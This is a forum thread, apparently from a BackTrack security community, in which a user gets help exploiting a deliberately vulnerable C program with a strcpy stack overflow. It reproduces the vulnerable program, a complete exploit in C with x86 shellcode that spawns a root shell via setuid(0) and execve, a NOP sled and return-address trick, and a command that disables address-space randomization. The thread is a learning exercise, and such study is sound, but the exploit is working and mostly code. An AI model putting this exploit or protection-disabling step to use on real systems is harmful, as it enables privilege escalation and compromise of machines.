Buffer Overflow

I was wondering if anyone could make a tutorial or a video thats demonstrating a simple buffer overflow on BackTrack.. I tried allot of tutorials already but none of them work on BackTrack.

What exactly do you need? A simple theoretical example with C source code and debugger or....something more complex (in this 2nd case I cannot help you) :)

I would like to exploit this code

Code:

---

#include <stdio.h>
#include <stdlib.h>

// 1024 bytes buffer
// 4 bytes to overwrite ebp
// 4 bytes to overwrite eip
// 1032 bytes :)

void viewer(char *string)
{
char buffer[1024];

strcpy(buffer,string);

printf("You have entered: %s\n",buffer);

return;
}

int main(int argc, char *argv[])
{

if(argc < 2)
{
  printf("%s <something> \n",argv[0]);
  return 0;
}

viewer(argv[1]);
return 0;
}

---

with a shellcode.

I tried various tut's already but none of them seem to work on BackTrack.

Like when I load an egg and then use an eggfinder the address changes all the time..

Dear UnnamedOne,

Could you please check this thread:
http://forums.remote-exploit.org/showthread.php?t=14255

We have been discussing recreating buffer overflows on known exploits, we will be happy to join us :)

mmm....If i've not misunderstood, your problem is the randomization of memory (kernels starting from 2.6.12 add a stack protection by default).

type from shell (as root):

Code:

---

echo 0 > /proc/sys/kernel/randomize_va_space

---

it should work 'til the next reboot.....

Quote:

---

Originally Posted by kanto.86

mmm....If i've not misunderstood, your problem is the randomization of memory (kernels starting from 2.6.12 add a stack protection by default).

type from shell (as root):

Code:

---

echo 0 > /proc/sys/kernel/randomize_va_space

---

it should work 'til the next reboot.....

---

I really got to thank you :) Works great now!

EDIT: Well, it works by loading an egg, but not with this code..

Code:

---

#include <stdio.h>
#include <stdlib.h>
#include <string.h>

#define NOP 0x90      // defining the NOP
#define VUL_FILE "./vuln"

char shellcode[] =
                "\x31\xc0\x31\xdb\x31\xd2\x53\x68\x69\x74\x79\x0a\x68\x65\x63"
                "\x75\x72\x68\x44\x4c\x20\x53\x89\xe1\xb2\x0f\xb0\x04\xcd\x80"
                "\x31\xc0\x31\xdb\x31\xc9\xb0\x17\xcd\x80\x31\xc0\x50\x68\x6e" // our shellcode
                "\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x8d\x54\x24\x08\x50\x53"
                "\x8d\x0c\x24\xb0\x0b\xcd\x80\x31\xc0\xb0\x01\xcd\x80";

unsigned long get_sp(void)
{
        __asm__("movl %esp, %eax");        // this function returns the stack pointer address, hopefully where
}                                                                                // our shellcode is stored.

int main(int argc, char *argv[], char **envp)
{
        int buff = 1032;            // size of the vuln buffer.
        unsigned long addr;      // addr of shellcode.
        char *ptr;    // used for adding nops etc.
        if(argc > 1)
                buff = atoi(argv[1]);      // if the user supplies a size, use this instead.

        if((buff % 4) != 0)                                              // if the size is not a mem addr (divisable by 4)
                buff = buff + 4 - (buff % 4);      // add 4 to it, take away the remainder (makes it divisable by 4)

        if((ptr = (char *)malloc(buff)) == NULL)    // check to see you allocated enough memory.
        {
                printf("Error allocating memory.\n");
                exit(0);
        }
        addr = get_sp();                  // get the address of our shellcode hopefully.
        memset(ptr, NOP, buff);        // fill the buffer with NOPS making our chances higher.
        memcpy(ptr + buff - strlen(shellcode) - 8, shellcode, strlen(shellcode));    // store the shellcode in the buffer.
        *(long *)&ptr[buff - 4] = addr;        // make eip point to our shellcode.
        execl(VUL_FILE, "exploit example1", ptr, NULL);      // execute the vuln program with our NOPS&shellcode in the buffer.
        printf("Addr: %s\n",addr);
        return 0;
}

---

The source code appears to be ok. The only other information I have to give you is that some OS mark the stack as "not executable" (precisely to prevent stack overflow, so this is because heap overflow and return-into-libc exist :D ).

I think you should try to look at the thread posted by l1nuxant_ee...My advice is to try one of the known exploit and see what happen: if everything works, an error may be present in your code. Otherwise may the stack be "not executable" and we have to change this setting....(or we need the help of someone more expert ;) )

Quote:

---

Originally Posted by kanto.86

The source code appears to be ok. The only other information I have to give you is that some OS mark the stack as "not executable" (precisely to prevent stack overflow, so this is because heap overflow and return-into-libc exist :D ).

I think you should try to look at the thread posted by l1nuxant_ee...My advice is to try one of the known exploit and see what happen: if everything works, an error may be present in your code. Otherwise may the stack be "not executable" and we have to change this setting....(or we need the help of someone more expert ;) )

---

Don't ask me why, but I removed

Code:

---

addr = get_sp();                  // get the address of our shellcode hopefully.

---

and changed

Code:

---

unsigned long addr;      // addr of shellcode.

---

to

Code:

---

unsigned long addr = get_sp();      // addr of shellcode.

---

and now the code works fine :)

Time to learn remote buffer overflow I think now :)

Haha! Cool !! We don't ask for this mistery of C but we are happy that everythings now work. Great ! :D